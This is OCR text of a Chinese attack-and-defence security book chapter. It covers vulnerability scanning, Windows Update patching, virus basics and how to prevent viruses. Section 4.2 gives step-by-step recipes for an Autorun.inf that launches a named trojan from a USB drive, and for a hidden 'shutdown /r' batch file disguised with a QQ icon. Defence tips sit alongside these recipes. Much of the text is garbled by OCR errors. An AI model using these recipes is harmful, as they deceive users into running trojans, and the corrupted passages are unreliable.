入 这 些 计 算 机 所 在 域 来 确定 , 这 样 即 可 检测 相应 域 中 的 所 有 计算 机 。 也 可 通过 在 “IP address 
range” 栏 中 输入 IP 地 址 段 的 起 始 IP 地 址 和 终 I 上 IP 地 址 来 确定 ， 这 样 只 检测 IP 地 址 范围 
内 的 计算 机 ， 如 下 右 图 所 示 。 单 击 “Start Scan” 按 钮 ， 同 样 可 以 开始 检测 。 











:3 








Check computers for common security misconfigurations. Which computers do you want to scan? 


The Microsoft Baseline Security Analyzer can check computers running Microsoft Windows Ee re te 
Server 2008 R2, Windows 7, Windows® Server 2003, Windows Server 2008, L : =| 
Windows Vista, Windows XP or Windows 2000. Scanning computers for security updates 

utilizes Windows Server Update Services. You must have administrator privileges for each 


computer you want to scan. 


。 » to 
%D% - HC% (HTN) 
%DW% = domain, %C9% = computer, %T% = date and time, %IP% = IP address 


‘Be Scan a computer 
Check a computer using its name or IP Address. 





Check for Windows administrative vulnerabilities 

JI Check for weak passwords 

Check for IIS administrative vulnerabilities 

VY| Check for SQL administrative vulnerabilities 

Check for security updates 

团 Configure computers for Microsoft Update and scanning prerequisites 
| Advanced Update Services options: 
































View existing security scan reports 
View, print and copy the results from the previous scans. 



































5 Update 修复 系统 漏洞 


Windows Update 是 一 个 基于 网 络 的 Microsoft Windows 操作 系统 的 软件 更 新 服务 。 
Windows Update 能 够 提供 一 个 下 载 紧 急 系统 组 件 更 新 、 服 务 升级 包 〈Service Packs)、 安 全 修 
补 程 序 (Security fixes)、 补 本 以 及 选 定 的 Windows 组 件 免 费 更 新 ,保证 系统 更 加 安全 、 稳 定 。 

使 用 Windows Update 修复 系统 漏洞 的 具体 步骤 如 下 。 

STEP01: 打开 “控制 面板 ”窗口 STEP02: Windows 更 新 
» 














厨 所 有 控制 面板 项 ， Windows Update 
文件 (月 ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
控制 面板 主页 


文件 () ”编辑 (E) ”得 看 (V) 工具 (T) 帮助 (H) 

‖ 调整 计算 机 的 设置 
Be Intel(R) GMA Driver | Internet 选项 
Java Sy Program Updates 


四 Realtek 高 清晰 音频 管理 器 Ee RemoteApp 和 桌面 连接 





Windows Update 


加 Windows Cardspace Ee | Windows Defender 


J 各 份 和 下 局 名 操 fF 中 心 


@ ”电话 和 调制 解 词 器 


更 改 设置 
查看 更 新 历史 记录 
还 原 隐藏 的 更 新 
更 新 : 常见 问题 





单 击 “Windows Update” 选 项 。 单 击 窗口 左 侧 的 “检查 更 新 ”选项 。 
STEP03: 选择 重要 更 新 补丁 STEP04: 选择 要 安装 的 补丁 


[= es 
GO 所 有 控制 面板 项 » Windows Update 7 | 好 | 次 实 芒 寺 画 析 D 加 - 加 “< Windows Up... } 逻 反 要 安装 的 更 新 | Y | 他 | E37 
文件 (F) ”编辑 (E) ”查看 (V) 工具 (TD) 帮助 (H) 文件 (F) ”编辑 (E) ”查看 (V) 工具 WT) ”帮助 (H) 
, 选择 希望 安装 的 更 新 
控制 加 原生 内 Windows Update 
回 名 称 7 适用 于 Windows 7 的 


(3) Office 2003 (1) Internet Explorer 11 
仓 安装 计算 机 的 更 新 网 Microsoft Office File Validation Add-in Internet Explorer 11。 在 

















Windows 7 (2 


pp 
站 要 要 更 新 可 用 | pi 个 至 枕 更新 ， | 回 | 适用 于 Windows 7 的 Internet Explorer 11 


42 个 可 选 委 新 可 用 用 于 Windows 了 的 Microsoft .NET Framework 4.5.1 (KB. 53.0 MB 


ER 


克 Microsoft Office File Validation Add-in 1.9MB 




















村 新 的 时 间 : ”昨天 18:00 
司 , 昨天 20:29 (失败 )。 可 操 要 新 历史 记录 
适用 于 Windows 产品 和 其他 来 自 Microsoft 
Update 的 产品 发 布 日 期 : 2013/11/11 


在 实 装 出 更 新 之 后 可 


SET 取消 |] 


/A 
YW 











单 击 “2 个 重要 更 新 可 用 "。 勾 选 需要 安装 单 击 “ 确 定 ” 
的 更 新 。 按钮。 
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系统 漏洞 攻防 


STEP05: 开始 安装 更 新 STEP06: 正在 下 载 更 新 


一 i 一 lx 


二 同志 里 * 所 有 控制 面板 项 ， Windows Update ~|9| 其 关节 潮 夯 原 GO"|E x 所 有 控制 面板 项 > Windows Update 加 cal 竹 寺 共和 夯 版 也 


文件 (站 ”编辑 (E) ”可 看 (V) ”工具 (D 帮助 (H) 文件 (前 ”编辑 (E) ”可 者 (V) 工具 (T) ”帮助 (H) 











控制 面板 主页 控制 面板 主页 


Windows Update 
花 杏 可 条 检查 更 新 

更 改 设置 同 pe , 更 改 设置 ~ 二 
音 看 更 新 历史 记录 | 安装 计算 机 的 更 新 埋 看 更 新 历史 记录 © 正在 并 二 


Windows Update 


还 原 隐 荡 的 更 新 2 个 重要 更 新 可 用 已 选择 1 个 重要 更 新 ， 还 原 隐藏 的 更 新 


42 个 可 选 更 新 可 用 | 19 MB 


更 新 : 常见 问题 更 新 : 常见 问题 


停止 安装 (9) 


最 近 检查 更 新 的 时 间 : ”昨天 18:00 ， 

安装 更 新 的 时 间 : 昨天 20:29 (失败 。 查看 更 新 历史 这 和 最 过 检 查 更 新 的 时 间 : 今天 13:12 Wy 

接收 更 新 适用 于 Windows 产品 和 其 他 来 目 Nlicrosoft 安装 更 新 的 时 间 : 昨天 20:29 (失败 )。 前 各 更 新 历 实 记录 
Update 的 产品 接收 更 新 : 适用 于 Windows 产品 和 其他 来 自 Microso 人 ft 

Update 的 产品 














返回 “Windows Update” 窗 口 , 单 击 “ 安 装 更 新 ” 此 时 界面 中 出 现 补 丁 下 载 进度 条 ， 耐 心 等 待 。 
按钮 。 


STEP07: 重启 计算 机 


OO mn, windowsUpdate -||| Rew eC | 
文件 (有 ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 
控制 面板 主页 


Windows Update 


检查 更 新 


aera | @ wwesrm 单 击 “立即 重新 启动 ” 按钮 ,对 计算 机 进行 重启 。 重 


mwnp Eo 启 过 程 中 计算 机 会 自动 安装 漏洞 补丁 ， 中 途 切 勿 断 
2 电 或 关闭 计算 机 。 


文件 , 然后 重新 启动 计算 机 。 


最 近 检 查 更 新 的 时 间 : 今天 13:12 

安装 更 新 的 时 间 : 今天 17:22。 童 告 更 新 历 安 记录 

接收 更 新 : 适用 于 Windows 产品 和 其 他 来 自 Microsoft 
Update 的 产品 
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病毒 攻防 


计算 机 病毒 可 以 很 快 地 蔓延 ， 又 常常 难以 根除 ， 也 是 黑客 常用 的 攻击 用 户 
计算 机 的 手段 。 所 以 了 解 病毒 的 特点 ， 做 好 预防 工作 非常 重要 。 本 章 主要 揭露 
几 种 病毒 的 入 侵 与 防范 方法 ， 有 助 于 读者 有 效 地 防范 计算 机 病毒 ， 


了 解 计算 机 病毒 

Restart 病毒 和 TU 盘 病 毒 的 生成 与 防范 
了 解 脚本 病毒 的 生成 与 防范 

宏 病毒 与 邮件 病毒 的 防范 

网 络 蠕虫 的 防范 

杀毒 软件 的 使 用 





< 人 第 4 章 
病毒 攻防 


4.1 病毒 知识 入 门 


目前 ， 计 算 机 病毒 在 形式 上 越 来 越 难以 辨 刚 ， 其 造成 的 危害 也 日 瘟 严 重 ， 所 以 要 求 网 
络 防毒 产品 在 技术 上 更 先进 ， 切 能 上 更 全 面 。 








和 11 计算 机 病毒 的 特 操 


一 般 ， 计 算 机 病毒 具有 如 下 儿 个 共同 的 特点 。 

1) 程序 性 《可 执行 性 ): 计算 机 病毒 与 其 他 合法 程序 一 样 ， 是 一 段 可 执行 程序 ， 但 它 
不 是 一 个 完整 的 程序 ， 而 是 寄生 在 其 他 可 执行 程序 上 ,， 所 以 它 近 有 该 程序 所 能 得 到 的 权力 。 

2) 传染 性 : 传染 性 是 病毒 的 基本 特征 ， 计 算 机 病毒 会 通过 各 种 渠道 从 已 被 感染 的 计算 
机 扩散 到 未 被 感染 的 计算 机 。 病 毒 程序 代 人 码 一 旦 进入 计算 机 并 被 执行 ， 就 会 日 动 搜寻 其 他 
符合 其 传染 条 件 的 程序 或 存储 介质 ， 确 定 目标 后 再 将 目 身 代码 插入 其 中 ， 实 现 目 我 索 殖 。 

3) 潜伏 性 ; 一 个 编制 精巧 的 计算 机 病毒 程序 ， 进 入 系统 乙 后 一 般 不 会 马上 发 作 ， 它 可 
以 在 一 段 很 长 时 间 内 隐藏 在 合法 文件 中 ， 对 其 他 系统 进行 传染 ， 而 不 被 人 发 现 。 

4) 可 触发 性 : 是 指 病毒 因 某 个 事件 或 数值 的 出 现 ， 诱 使 病毒 实施 感染 或 进行 攻击 的 
特性 。 

5) 破坏 性 : 系统 被 病毒 感染 后 ,病毒 一 般 不 会 并 刻 及 作 ， 而 是 潜藏 在 系统 中 ， 等 条 件 
成 熟 后 便 会 改作， 给 系统 各 来 严重 的 破坏 。 

6) 主动 性 : 病毒 对 系统 的 攻击 是 主动 的 ， 无 论 计 算 机 系统 采取 多 么 严密 的 保护 措施 ， 
者 不 可 能 彻 撒 地 排除 病毒 对 系统 的 攻击 ， 而 你 护 撞 施 上 只 是 一 种 预防 的 手段 。 

7) 针对 性 : 计算 机 病毒 是 针对 特定 的 计算 机 和 特定 的 操作 系统 的 。 



























































412 病毒 的 三 个 基本 结构 


计算 机 病毒 本 喘 的 特点 是 由 其 结构 决定 的 ， 所 以 计算 机 病毒 在 其 结构 上 有 其 共同 性 。 
计算 机 病毒 一 般 包 括 引 导 模 块 、 传 染 模块 和 表现 〈 和 破坏 ) 模块 三 大 功能 模块 ， 但 不 是 任何 
病毒 都 包含 这 三 个 模块 。 传 染 模 块 的 作用 是 负责 病毒 的 传染 和 扩散 ， 而 表现 《和 破坏) 模块 
则 负责 病毒 的 破坏 工作 ， 这 两 个 模块 各 包 侣 一 段 触发 条 件 检查 代码 ， 当 各 段 代码 分 别 检查 
出 传染 和 表现 或 破坏 触发 条 件 时 , 病毒 就 会 进行 传染 和 表现 或 破坏 。 触 发 条 件 一 般 由 日 期 、 
时 间 、 茶 个 特定 程序 、 传 染 次 数 等 多 种 形式 组 成 。 

1) 对 于 寄生 在 磁盘 引导 书 区 中 的 病毒 ， 病 毒 引导 程序 占有 了 原 系 统 引导 程序 的 位 置 ， 
并 把 原 系 统 引 导 程 序 搬移 到 一 个 特定 的 地 方 。 系 统一 启动 ， 病 毒 引 导 模 块 就 会 自动 地 载 入 
内 存 并 获得 执行 权 ， 该 引导 程序 负责 将 病毒 程序 的 传染 模块 和 发 作 模块 朔 入 内 存 的 适当 位 
和 锭 ， 并 米 取 常 驻 内 存 拉 术 以 保证 这 两 个 模块 不 会 被 履 荔 ， 再 对 这 两 个 模块 设 定 菜 种 激活 方 
式 ， 使 之 在 适当 时 候 获得 执行 权 。 处 理 完 这 些 工作 后 ， 病 毒 引导 模块 将 系统 引导 模块 装 入 
内 存 ， 使 系统 在 市 病毒 状态 下 运行 。 

对 于 寄生 在 可 执行 文件 中 的 病毒 ， 病 毒 程序 一 般 通 过 修改 原 有 可 执行 文件 ， 使 该 文件 
在 执行 时 先 转 入 病毒 程序 引导 模块 ， 该 引导 模块 也 可 完成 把 病毒 程序 的 其 他 两 个 模块 驻 留 
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Py 
2 攻防 从 入 门 到 精通 
全 人 人 他 


内 存 及 初始 化 的 工作 ， 把 执行 权 交 给 执行 文件 ， 使 系统 及 执行 文件 在 带 毒 的 状态 下 运行 。 

2) 病毒 的 被 动 传染 是 指 随 看 复制 磁盘 或 文件 工作 的 进行 而 进行 传染 的 。 计 算 机 病毒 的 
主动 传染 的 过 程 是 : 在 系统 运行 时 ， 病 毒 通过 病毒 载体 即 系 统 的 外 存储 器 进入 系统 的 内 存 
储 器 、 常 驻 内 存 ， 并 在 系统 内 存 中 监视 系统 的 运行 。 

在 病毒 引导 模块 将 病毒 传染 模块 驻 留 内 存 的 过 程 中 ， 通 各 还 要 修改 系统 中 断 癌 量 入 口 
地 址 (例如 INT13H 或 INT21H), 使 该 中 断 问 量 指 问 病毒 程序 传染 模块 。 这 样 ， 一 旦 系统 
执行 磁盘 读 写 操作 或 系统 功能 调用 ， 病 毒 传染 模块 束 被 激活 ， 传 染 模 块 在 判断 传染 条 件 满 
足 的 条 件 下 ， 利 用 系统 INT 13H 读 写 磁盘 中 断 把 病毒 自身 传染 给 被 读 写 的 磁盘 或 被 加 载 的 
程序 ， 也 就 是 实施 病毒 的 传染 ， 有 再 转移 到 原 中 断 服 务 程序 执行 原 有 的 操作 。 

3) 计算 机 病毒 的 破坏 行为 体现 了 病毒 的 杀伤 力 。 病 毒 破 坏 行为 的 激烈 程度 ， 取决 于 病 
毒 作者 的 主观 愿望 和 其 所 具有 的 技术 能 量 。 

数 以 万 计 、 不 断 发 展 扩 张 的 病毒 ， 其 破坏 行为 干 奇 百 怪 ， 不 可 能 穷 举 其 破坏 行为 ， 难 
以 作 全 面 的 描述 。 病 毒 破 坏 目 标 和 攻击 部 位 主要 有 系统 数据 区 、 文 件 、 内 存 、 系 统 运 行 、 
运行 速度 、 磁 盘 、 屏 幕 显 示 、 键 盘 、 喇 叭 、 打 印 机 、CMOS、 主 板 等 。 


ll 



























































4.1.3 ”病毒 的 工作 流程 


计算 机 系统 的 内 存 是 一 个 非 营 重要 的 资源 ， 所 有 的 工作 都 需要 在 内 存 中 运行 。 病 毒 一 
般 都 是 通过 各 种 方式 把 目 己 植 入 内 存 ， 获 取 系 统 最 高 控制 权 ， 以 感染 在 内 存 中 运行 的 程序 。 

计算 机 病毒 的 完整 工作 过 程 应 包括 如 下 几 个 环节 。 

1) 传染 源 : 病毒 总 是 依附 于 菏 些 存储 介质 ， 如 U 盘 、 僻 盘 等 构成 传染 源 。 

2) 传染 媒介 : 病毒 传染 的 媒介 由 其 工作 的 环境 来 决定 的 ， 可 能 是 计算 机 网 络 ， 也 可 能 
征 可 移动 的 存储 介质 ， 如 U 盘 等 。 

3) 病毒 油 活 : 是 指 将 病毒 疤 入 内 存 ， 并 设 症 触发 条 件 。 一旦 触发 条 件 成 熟 ， 病 毒 束 开 
始 目 我 复制 到 传染 对 象 中 ， 进 行 各 种 破坏 活动 等 。 

4) 病毒 触及 :计算 机 病毒 一 旦 被 激活 ， 束 会 立刻 发 生 作用 。 触 发 的 条 件 是 多 样 化 的 ， 
可 以 是 内 部 时 钟 、 系 统 的 日 期 、 用 户 标 识 伯 ， 也 可 能 是 系统 一 次 通信 等 。 

5) 病毒 表现 : 表现 是 病毒 的 主要 目的 之 一 ， 有 时 在 屏幕 显示 出 来 ， 有 时 则 表现 为 破坏 
系统 数据 。 几 是 软件 撤 术 能 够 触发 到 的 地 方 ， 都 在 其 表现 匈 围 内 。 

6) 传染 : 病毒 的 传染 是 病毒 性 能 的 一 个 重要 标志 。 在 传染 环节 中 ， 病 毒 复制 一 个 目 身 
的 副本 到 传染 对 象 中 去 。 计 算 机 病毒 的 传染 是 以 计算 机 系统 的 运行 及 读 写 人 磁 副 为 基础 的 。 
没有 这 样 的 条 件 ， 计 算 机 病毒 是 不 会 传染 的 。 只 要 计算 机 运行 ， 就 会 有 磁盘 读 写 动作 ， 病 
毒 传 染 的 两 个 先决 条 件 就 很 容易 得 到 满足 。 系统 运 行为 病毒 驻 留 内 存 创造 了 条 件 ， 病毒 传 
染 的 第 一 步 是 驻 留 内 存 ;一 旦 进入 内 存 之 后 ， 寻 找 传染 机 会 ， 寻 找 可 攻击 的 对 象 ， 判 断 条 
件 是 否 满足 ， 决 定 是 否 可 传染 ; 当 条 件 满足 时 进行 传 风 ， 将 病毒 号 入 磁盘 系统 。 


4.2 ”两 种 简单 病毒 的 生成 与 防范 


病毒 的 编号 是 一 种 高 深 扩 术 ， 真 正 的 病毒 一 般 都 具有 : 传染 性 、 隐 藏 性、 破坏 性 。 本 
节 介 绍 两 款 简 单 病 毒 ，Restart 病毒 和 U 盘 病毒 。 
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< 第 4 章 


病毒 攻防 


4.2.1 了 盘 病毒 的 生成 与 防 沧 


U 盘 病 毒 ， 又 称 Autorun 病毒 ， 束 是 通过 UU 盘 ,， 产 生 AutoRun.inf 进行 传播 的 病毒 。 随 
厦 U 盘 、 移 动 便 盘 、 存 储 卡 等 移动 存储 设备 的 普及 ，U 盘 病 毒 已 经 成 为 现在 比较 流行 的 计 
算 机 病毒 之 一 。U 盘 病 毒 并 不 是 只 存在 于 U 盘 上 ， 中 毒 的 计算 机 每 个 分 区 下 面 同 样 有 TU 盘 
病毒 ， 计 算 机 和 TU 盘 交 叉 传 播 。 

1. U 盘 病 毒 生成 曝光 

了 解 U 盘 病毒 的 生成 方法 与 传播 方式 ， 才 能 够 更 好 地 进行 U 盘 病 毒 的 防范 。 下 面 曝光 
人 简单 的 UU 桩 病毒 的 生成 过 程 。 





























STEP01: 将 病毒 或 木马 复制 到 U 盘 中 STEP02: 在 U 盘 中 新 建文 本 文档 


ren") 


CHS | Hi , Ta (+ | 好 用 其 和 33 (6G) 也 


文件 (F) ”编辑 (E) ” 音 看 (V) 工具 (T) 帮助 (H) 


ee) 


文件 (F) ”编辑 (E) ”查看 (V) 工具 (TM) 帮助 (H) 
组 织 了 司 打开 ~ 打印 ” 新 建文 件 去 


六 收 项 夫 
BT | 





> 


图 襄 面 
邓 最 后 访问 的 位 置 


新 建文 件 夫 (2) 


国耻 
蜀 计 于 丁目 复制 到 可 移动 磁盘 (G3) 











司库 

部 PPTV 视 频 
里 视频 
国 图 片 
国 文档 








直接 拖 动 病毒 或 木马 程序 到 U 盘 中 。 将 新 建 的 文本 文档 重 命 名 为 Autorun.inf。 


STEP03: 查看 提示 信息 STEP04: 编写 Autorun.inf 文件 代码 


口 Xx 


© S mr 计算 .，， 可 移动 磁盘 (.， ”| 二 散 才 可 戎 动态 二 (6G: A 


文件 (站 ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 


文件 (F) ”编辑 (E) 格 f(O) 查看 (V) 帮助 (H) 


[AutoRun] 


OPEN= 灰 鸟 子 . exe 
shellexecute= 灰 驴子 . exe 
shell\Auto\command= 灰 驴子 . exe 








新 建文 本 文档 .txt 修改 日 期 : 2014/3/6 14:25 


大 小 : 0 字 节 
创建 日 期 : 2014/3/6 14:25 





单 击 “是 ”按钮 。 双击 Autorun.inf 文件 打开 记事 本 窗口 ,编辑 文件 代 
码 ， 使 得 双击 U 盘 图 标 后 运行 指定 木马 程序 。 


:oO 





最 RD > 


ry 7 ee : 
2 攻防 从 入 门 到 精通 





= 
靳 ”A 
STEP05: 查看 属性 STEP06: 将 文件 属性 设置 为 “隐藏 ” 





惟 ” 压 缩 并 E-mail... 

惟 ” 压 纺 到 " 灰 甬 子 .rar" 并 E-mail 
图 国 上传 到 百度 云 
自动 备份 到 百度 云 








全 ” 舍 用 Nero 进行 刻录 
各 ” 通 QQ 发 送 到 我 的 手机 








发 送 到 (NN) 
5 辐 只 读 o) | 园 隐 藏 00 | 园 存档 上 ) 











复制 (O 〇 ) 
EH: 2014/3/6 14:23 于 
:0 Ee 
EE: 2014/3/6 14:25 下 命名 (M) 
按 住 <Ctrl> 键 将 木马 程序 和 Autorun.inf 文件 一 起 切换 至 “常规 勺 选 “隐藏 ” 复 选 框 ， 
选中 并 右 击 ， 在 弹出 的 快捷 菜单 中 单 击 “ 属 性 ” 命 ”选项 卡 。 然后 单 击 “ 确 定 ” 按 钮 。 
Ss 
EE 


STEP07: 单 击 “ 文 件 夹 选 项 ” STEP08: 设置 不 显示 隐藏 文件 


€1OF HES 


人 
组 织 ” 加 打开 了 映射 网 络 疱 动 器 (N).… | ne 后 各 让 的 这 和 


断 开 网 络 殉 动 器 tpg].… 


7 收藏 夫 打开 同步 中 心 (S)... | 应 用 到 文件 来 [) 重 置 文件 来 各 ) 
ES 文件 去 选项 (OD) 
一 | 点 面 


况 最 访问 的 位 置 








司库 
图 PPTV 视 频 





在 U 盘 窗 口中 选择 “工具 ”> “文件 夹 选项 ”菜单 ” 国 切换 至 “ 查 辆 选中 “不 显示 隐藏 的 文件 、 文 

命令 。 看 ”选项 不。 ” 件 夹 或 驱动 器 " 单 选 按钮 ， 然 后 单 
击 “ 确 定 ” 按 钮 。 

将 TU 盘 接 入 计算 机 中 ， 右 击 U 熏 对 应 的 图 标 ， 会 在 快捷 菜单 中 看 到 “Auto ”命令 ， 表 































































































示 设 置 成 功 。 
2， 防 范 U 盘 病毒 on 
1) 防范 U 盘 病 毒 的 最 好 办 法 也 是 最 不 实用 的 办 法 ， 就 是 不 “a 一 一 

将 U 盘 插 到 安全 性 不 明 的 计算 机 里 ， 但 是 这 点 是 几乎 不 可 能 做 | 时 ee ee 

到 的 。 ed 
2) 打开 显示 隐藏 文件 、 文 件 夹 和 驱动 器 ， 取 消 隐 藏 已 知 文 ea 

件 的 扩展 名 。 这 可 以 有 效 防止 病毒 木马 伪装 为 文件 夹 及 正常 文件 i 

谤 骊 用 广 扩 而 。 | 
显示 隐藏 文 件 的 具体 方法 : 在 “计算 机 ”窗口 中 选择 “查看 ”> nr 























“文件 夹 选项 ”命令 ， 打开 “文件 夹 选 项 ”对 话 框 ， 如 右 图 所 示 。 本 2 
这 样 ， 在 能 正常 显示 隐藏 文件 或 扩展 名 的 情况 下 ， 模 仿 的 让 计算 机 显示 隐藏 文件 方法 


90 
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病毒 ， 例 如 图 标 是 文件 夹 的 exe 文件 ，*.jpg.exe (“*” 指 代 文 件 名 ， 下 同 )。 这 类 看 似 不 
正常 的 文件 ， 尽 量 不 要 去 点 击 。 需 要 注意 的 是 ，*.exe.jpg 也 不 要 随便 点 击 ， 这 有 可 能 是 
Unicode 反 转 。 除 此 之 外 , 网 址 快捷 方式 *.url 等 ,假设 某 文件 文件 名 是 WWW.PC841.COML， 
这 不 是 网 址 ， 而 是 后 级 名 为 com 的 软件 ， 基 本 可 以 肯定 它 是 伪装 的 病毒 。 对 于 上 述 两 类 
文件 ， 可 以 右 击 并 选择 “属性 ”命令 ， 查 看 其 文件 类 型 。 

3) 对 于 自动 运行 (AutoRun)〉 类 及 利用 系统 漏洞 的 病毒 ， 最 简单 的 办 法 是 安装 微软 的 
补丁 ， 可 以 使 用 诸如 金山 卫士 或 者 360 安全 卫士 的 漏洞 修补 功能 自动 修复 。 从 Windows 7 
系统 开始 自动 运行 (AutoRun) 类 病毒 方面 已 经 完善 了 ， 用 户 无 需 再 担心 此 问题 。 

4) 不 少 软件 有 非常 不 错 的 防 杀 效果 ， 例 如 360 卫士 及 杀毒 、 金 山 毒霸 、QQ 管家 7.0、 
江 民 、 瑞 星 、 卡 巴 、 诺 顿 等 。 
































4.2.2 ”Restatt 病毒 形成 过 程 曝光 


Restart 病毒 是 一 种 能 够 让 计算 机 重新 启动 的 病毒 ， 该 病毒 主要 通过 DOS 命令 “shut 
down/r” 命 令 来 实现 。 用 户 平 时 在 使 用 计算 机 过 程 中 或 许 倍 到 过 计算 机 不 断 重 局 的 情况 。 
下 面 将 曝光 Restart 病毒 的 形成 过 程 。 
SITEPUO 们 昌 新 建 一 个 文本 文档 STEP02: 打开 新 建 的 记事 本 
音 看 (V) 当 新 建文 本 文档 txt - 记事 本 

















排序 方式 (O) Microsoft PowerPo 文件 (RP ”编辑 (E) 格式 (O) 查看 (V) 帮助 (H) 
分 组 依据 (P) FO Microsoft PowerPo shutdown /r 

刷新 上 FE) Pa ACDSee PSD 图 像 

QH Microsoft Publishe 


自 定 以 立 件 去 (中 .… 


未 上 了 | 和 了 

粘贴 (P) 国 | Microsoft Excel 97- 
上 站 十 二 CC] J 
粘贴 快捷 方式 (9) 自习 Microsoft Excel 工 
撤消 删除 (U) Ctrl+Z 员 ”360 夺 缩 


新 建 (W) 
尾 性 (R) 





在 桌面 空白 处 单 击 鼠标 右键 ， 在 弹出 的 快捷 菜单 中 输入“ shutdown /r "命令 ， 即 自动 重启 本 地 计算 机 。 
选择 “新 建 ”> “文本 文档 ”命令 。 

STEP03: 保存 文件 STEP04: 重 命 名 文本 文档 为 腾讯 QQ.bat 
了 新 建文 本 文档 ,txt - 记事 本 


葡 件 (H) | 编辑 (E) 格式 (O) 但 春 (V) 帮助 (H) 


Ctr|+N 


Ctrl+O 腾 汛 OObat 





另 人 存 为 ( 具 )… 


页 面 设置 (U).. 用 如 果 改 变 文 件 扩展 名 ， 可 能 会 导 骆 文件 不 可 用 。 


打印 (中 ..， Ctrl+P 认 立 要 再 改 吧 ? 
退出 的 





选择 “文件 > “保存 ”菜单 命令 。 在 弹出 的 “ 重 命名 ”对 话 框 中 单 击 “是 ”按钮 。 
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| 二 二 | 
sr [ 安 





STEP05: 右 击 “腾讯 QQ.bat” 图 标 





在 弹出 的 菜单 中 单 击 “ 创 建 快捷 方式 ”命令 。 
STEP07: 更 改 图 标 


基诺 讯 QQ,bat- 快 捷 方 式 尾 性 


[请 失当 以 前 的 版 本 


全 六 式 


讯 gg bat- 快 捷 方 式 


打开 文件 位 置 中 ) 


应 用 以) 


确定 | 取 梢 


切换 至 “快捷 方 
式 ” 选项 卡 。 
STEP09: | 选择 图 标 
更 改 图 标 
查找 此 交 件 中 的 图 标 QL): 
RSYstemRoot%wsystem32ASHELL32. 


由 以 下 到 表 中 选择 一 个 图 标 号) : 


单 击 “ 更 改 图 标 " 
按钮 。 


在 列表 中 选择 程序 图 标 ， 如 果 疫 有 合适 的 ， 则 单 击 
“浏览 ”按钮 。 











攻防 从 入 门 到 精通 


STEP06: 右 击 “ 腾 讯 QQ.bat- 快 捷 方 式 ” 
图 标 


还 原 以 前 的 版 本 (V) 
发 送 到 (N) 
莫 切 中 ) 


复制 (C) 
粘贴 (p) 


创建 快捷 方式 [5) 
删除 (D) 
重 命 名 [MI) 


在 弹出 的 菜单 中 单 击 “ 属 性 ”命令 。 
STEP08: 查看 提示 信息 
以 恬 讯 和 QQ.bat- 快 捷 方 式 导 性 


颜色 | 兼容 性 | 安全 | 详细 信息 | TT 


党 规 “| 快捷 方式 | 这 页 ”| -字体 | 布局 


作 文件 EN 新 建文 件 志 \ 计 算 机 关 \ 新 建文 件 闯 \ 话 讯 QQ.bat 不 包 合 图 标 ， 
全 请 从 列表 中 运 择 一 个 图 标 或 指定 秀一 个 文件 ， 


单 击 “确定 ”按钮 。 








STEP10: 选择 ico 格式 的 图 标 
三 | 更 改 图 标 
组 织 新 六 文件 实 
岂 下 载 


周 | 桌面 
泣 最 近 访 问 的 位 置 





2bit (2).exe 


- 


文件 各 (N): 腾 汛 qq 图 标 下 载 Licd 


打开 图 标 保存 位 置 ， 选中 单 击 “ 打 开 " 
ico 格式 图 标 。 按钮 。 
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STEP11: 查看 已 选 的 ico 图 标 
更 改 图 标 


查找 此 交 件 中 的 图 标 (L): 
E 腾讯 aq 国标 下 载 1. ieo 


内 以 下 到 表 中 选择 一 个 图 标 名 ) : 


单 击 “ 确 定 ”按钮 。 
STEP13: 查看 修改 后 的 快捷 图 标 





le 


在 桌面 上 查看 修改 后 的 快捷 图 标 , 将 其 名 称 改 为 
“腾讯 QQ”。 
STEP15: 将 文件 设置 为 隐藏 


常规 || 快捷 方式 | -选项 | 字体 | -布局 


下 





腾讯 QQ. bat 





回 只 读 ) 回 隐 藏 


切换 至 “常规 " 选项 卡 。 辆 单 击 “ 确 定 " 按钮 。 
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STEP12: 查看 生成 的 腾讯 QQ.bat 图 标 
二 放 讯 QQ,bat- 快 捷 方 式 硬性 


_ 安全 ”| 详细 信息 
快捷 方式 | 选项 ”| 字体 | 布局 


腾讯 QQ. bat- 快 捷 方 式 


e 


目标 类 型 : 


目标 位 置 : 





Windows 批 处 理 文件 
新 建文 件 夹 





单 击 “ 确 定 ” 按 钮 。 
STEP14: 右 击 .bat 快捷 图 标 


还 原 以 前 的 版 本 (V) 
点 送 到 (N) 

莫 切 人 m) 

怎 制 (OQ) 


创建 快捷 方式 [5) 
删除 (D) 
重 命名 [M) 


li 


在 弹出 的 快捷 菜单 中 单 击 “属性 ”命令 。 
STEP16: 打开 “文件 夹 ” 选 项 
映射 网 络 驱动 器 (N).. 


断 开 网 络 疱 动 器 (D)… 
打开 同步 中 心 [S).… 


组 织 Y 系统 尾 性 





六 收 项 夫 
见 下 载 
图 点 面 


呈 最 近 访 问 的 位 置 6.51 GB 可 用 ， 


tutuDisK NW:) 





辐 库 499 MB 吕 用 ， 


在 桌面 上 双击 “计算 机 ”图 标 ， 然 后 选择 “工具 ”> 
“文件 夹 选项 ”命令 。 


于 

取 = > 

杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP17: 设置 不 显示 隐藏 的 文件 STEP18: 设置 后 在 采 面 上 查看 快捷 图 标 
| 文件 去 选项 国医 到 





常规 | | 查看 | 搜索 


% 件 来 视图 Sa 
以 将 该 文件 来 正在 使 用 的 视图 (例如 “详细 信 
司 。 胆 5 轴 村 和 和 二 和 妆 和 全 < 
> lag 
应 用 到 文件 来 L) | ”| 重 置 交 件 来 信 ) | 





高 铂 设 置 : 

MY| 隐藏 计算 机 文件 来 中 的 空 驱 动 器 

VV| 隐藏 受 保 护 的 操作 系统 文件 推荐 
隐藏 六 性 和 六 
© jm 
局 时 元 隐藏 和光 件 、 交 件 夹 和 红 动 直 


aH we + 


[| Gm Cwm | 
| 


切换 至 “ 查 选中 “不 显示 隐藏 的 文件 、 可 看 到 桌面 上 未 显示 “腾讯 QO.bat "图 标 ， 只 显示 




















看 ”选项 卡 。 文件 夹 或 驱动 器 ” 单 选 按钮 ， “腾讯 QQ 图 标 ， 用 户 一 旦 双击 该 图 标 ， 计算机 便 
然后 单 击 “ 确 定 ” 按 钮 。 会 重启 。 


4.3 ”脚本 病毒 的 生成 与 防范 


脚本 病毒 通常 是 由 JavaScript 代码 编写 的 恶意 代 但 , 一 般 带 有 广告 性 质 、 修改 IE 首页 、 
修改 注册 表 等 信息 。 脚 本 病毒 的 前 级 是 Script， 共同 点 是 使 用 脚本 语言 编写 。 通 过 网 页 进行 
